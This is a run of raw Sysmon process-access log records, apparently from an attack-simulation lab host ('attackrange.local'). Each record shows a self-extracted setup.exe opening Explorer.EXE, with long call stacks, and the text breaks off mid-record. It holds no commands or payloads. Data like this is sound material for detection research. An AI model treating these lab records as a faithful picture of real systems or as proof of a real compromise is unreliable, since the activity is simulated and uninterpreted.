13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows